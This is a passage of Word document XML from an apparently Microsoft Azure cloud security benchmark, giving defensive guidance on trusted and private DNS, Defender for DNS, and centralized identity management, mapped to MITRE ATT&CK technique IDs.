    <w:p w14:paraId="4ACD34DB" w14:textId="3BCCF3E1" w:rsidR="005A2E4F" w:rsidRDefault="005A2E4F" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267ABD43" w14:textId="0C4252E8" w:rsidR="009B38B0" w:rsidRPr="00E53977" w:rsidRDefault="009B38B0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B38B0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1498.002 - Network Denial of Service: Reflection Amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D8961E" w14:textId="5F2A69DF" w:rsidR="00FC57BF" w:rsidRDefault="005A2E4F" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D1393" w14:textId="0EA5BC90" w:rsidR="009B38B0" w:rsidRPr="00E53977" w:rsidRDefault="009B38B0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B38B0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD1769" w14:textId="1B56669D" w:rsidR="005A2E4F" w:rsidRDefault="005A2E4F" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-10.1: Use trusted DNS service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE10628" w14:textId="0E1A83E9" w:rsidR="002F7321" w:rsidRPr="002F7321" w:rsidRDefault="002F7321" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t xml:space="preserve">Use trusted DNS services to ensure clients receive correct resolution results and protect against DNS-based attacks. Azure provides the recursive DNS service at 168.63.129.16 (typically assigned via DHCP or preconfigured) for workload DNS resolution at the operating system or application level. Alternatively, use trusted external DNS servers. For organizations hosting their own domains, Azure DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7321">
        <w:lastRenderedPageBreak/>
        <w:t>provides reliable authoritative DNS hosting. Organizations building custom DNS servers should follow NIST SP 800-81 Rev. 3 secure deployment guidelines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9FEF42" w14:textId="310AA4D7" w:rsidR="00094254" w:rsidRPr="00E53977" w:rsidRDefault="00094254" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use Azure recursive DNS or trusted external DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C150734" w14:textId="4803B713" w:rsidR="00094254" w:rsidRPr="00E53977" w:rsidRDefault="006C0AB4" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Allow Azure DNS in firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1086D1" w14:textId="5A46E722" w:rsidR="006C0AB4" w:rsidRPr="00E53977" w:rsidRDefault="006C0AB4" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Host domains on Azure DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DEA76" w14:textId="20D544D0" w:rsidR="008E5214" w:rsidRPr="00E53977" w:rsidRDefault="008E5214" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Follow secure DNS deployment guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A674AAC" w14:textId="30B7FFA4" w:rsidR="00CA22D1" w:rsidRPr="00E53977" w:rsidRDefault="00CA22D1" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="108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Default="00CA22D1" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-10.2: Use Private DNS in virtual network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D93E8" w14:textId="33EF5027" w:rsidR="002F7321" w:rsidRPr="002F7321" w:rsidRDefault="002F7321" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t>Use Azure Private DNS to establish private DNS zones where DNS resolution remains within the virtual network, preventing DNS queries from traversing public networks. This is essential for private endpoint configurations, where private DNS zones override public DNS resolution to route traffic privately to Azure services. Custom DNS solutions can further restrict resolution to only trusted sources, enhancing security for private workloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D975FB" w14:textId="7F11BE60" w:rsidR="00AF6CFE" w:rsidRPr="00E53977" w:rsidRDefault="00AF6CFE" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy Azure Private DNS for private resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F911AE" w14:textId="7DA4DCE2" w:rsidR="00C21C55" w:rsidRPr="00E53977" w:rsidRDefault="00AF6CFE" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use Azure Private DNS to create private DNS zones that keep DNS resolution within the virtual network, ensuring queries never leave your network boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDA96F" w14:textId="3AC0261E" w:rsidR="00C21C55" w:rsidRPr="000666C6" w:rsidRDefault="00C21C55" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000666C6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure private DNS for private endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A702D37" w14:textId="68B5B628" w:rsidR="00C21C55" w:rsidRPr="00E53977" w:rsidRDefault="00C21C55" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement custom DNS for restricted resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43490C61" w14:textId="5EEB4363" w:rsidR="002F5241" w:rsidRPr="00E53977" w:rsidRDefault="002F5241" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use custom DNS servers to restrict DNS resolution to only allow trusted resolution sources for your clients, providing additional control over name resolution security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC72ECF" w14:textId="04ADA215" w:rsidR="002F5241" w:rsidRDefault="002F5241" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-10.3: Use Defender for DNS for advanced protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E33F3D" w14:textId="0496D937" w:rsidR="002F7321" w:rsidRPr="002F7321" w:rsidRDefault="002F7321" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t xml:space="preserve">Use Microsoft Defender for DNS to detect and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F7321">
        <w:t>alert on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F7321">
        <w:t xml:space="preserve"> advanced DNS-based security threats including data exfiltration via DNS tunneling, command-and-</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7321">
        <w:lastRenderedPageBreak/>
        <w:t>control communication, malicious domain interactions (phishing, crypto mining), and DNS attacks involving malicious resolvers. Defender for DNS protection is now included in Defender for Servers Plan. Additionally, use Microsoft Defender for App Service to detect dangling DNS records that could enable subdomain takeover attacks when decommissioning websites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1CED3" w14:textId="4278D242" w:rsidR="00157C62" w:rsidRPr="00E53977" w:rsidRDefault="00157C62" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enable Defender for DNS protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F722E" w14:textId="003732C0" w:rsidR="00CB27F3" w:rsidRPr="00E53977" w:rsidRDefault="00157C62" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Monitor for malicious DNS activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60913C09" w14:textId="1E0D1BE1" w:rsidR="000D4962" w:rsidRPr="00E53977" w:rsidRDefault="000D4962" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Detect dangling DNS records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012DEFC" w14:textId="1627BF42" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="006F0CE2" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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5E46035F" w14:textId="77777777" w:rsidR="001431B9" w:rsidRPr="00E53977" w:rsidRDefault="001431B9" w:rsidP="00314A45">
      <w:pPr>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5" w:name="_Toc242449478"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Identity Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5417E002" w14:textId="6B97B6F7" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00314A45">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc242449479"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Protect user’s identities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="18DFA269" w14:textId="1AF0421A" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00314A45">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc242449480"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-1: Centralize identity and authentication while ensuring isolation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="29061E4C" w14:textId="6BBAE722" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08563561" w14:textId="2B77023E" w:rsidR="00314A45" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use a centralized identity and authentication system to govern your organization's identities and authentications for cloud and non-cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC3AF01" w14:textId="36D818F0" w:rsidR="002F7321" w:rsidRPr="00E53977" w:rsidRDefault="002F7321" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t>While centralizing the identity and authentication, you should also ensure you segregate and isolate identities based on enterprise-wide strategy. The goal is to ensure that production environments are managed using credentials and identities that are separate from those used for day-to-day access. Strategies for segregating and isolating identities may include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07242B40" w14:textId="77777777" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="007937A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce Least Privilege Access for Identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119BEFF3" w14:textId="77777777" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="007937A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Segregate Administrative and Non-Administrative Identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2650EB83" w14:textId="77777777" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="007937A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Isolate Identities Across Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967B6D7" w14:textId="77777777" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="007937A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Implement Workload Identity Segregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB85B2" w14:textId="6ADE1D0F" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="007937A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce Identity Boundary Separation Across Tenants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A9B0B" w14:textId="5524B3A3" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43FBB41C" w14:textId="589EC839" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43968406" w14:textId="395E67D9" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Theft and Reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D122D4" w14:textId="0C2EA4B2" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="10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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Inconsistent Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290AD14" w14:textId="7EDBE5BD" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Without centralized governance, disparate systems may have varying access policies, leading to over-privileged accounts or orphaned accounts that attackers can exploit to escalate privileges or access unauthorized resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F88C1E" w14:textId="1BA84D7C" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of Visibility and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287512C0" w14:textId="57E4C54E" w:rsidR="00314A45" w:rsidRPr="00E53977" w:rsidRDefault="00314A45" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120732EB" w14:textId="219F492C" w:rsidR="00314A45" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F6A7E" w14:textId="17192406" w:rsidR="002F7321" w:rsidRPr="00E53977" w:rsidRDefault="002F7321" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t>T1078 - Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE2204" w14:textId="620C270B" w:rsidR="00314A45" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ECBD1E" w14:textId="16E73234" w:rsidR="002F7321" w:rsidRPr="00E53977" w:rsidRDefault="002F7321" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t>T1003 - OS Credential Dumping</w:t>
      </w:r>
    </w:p>
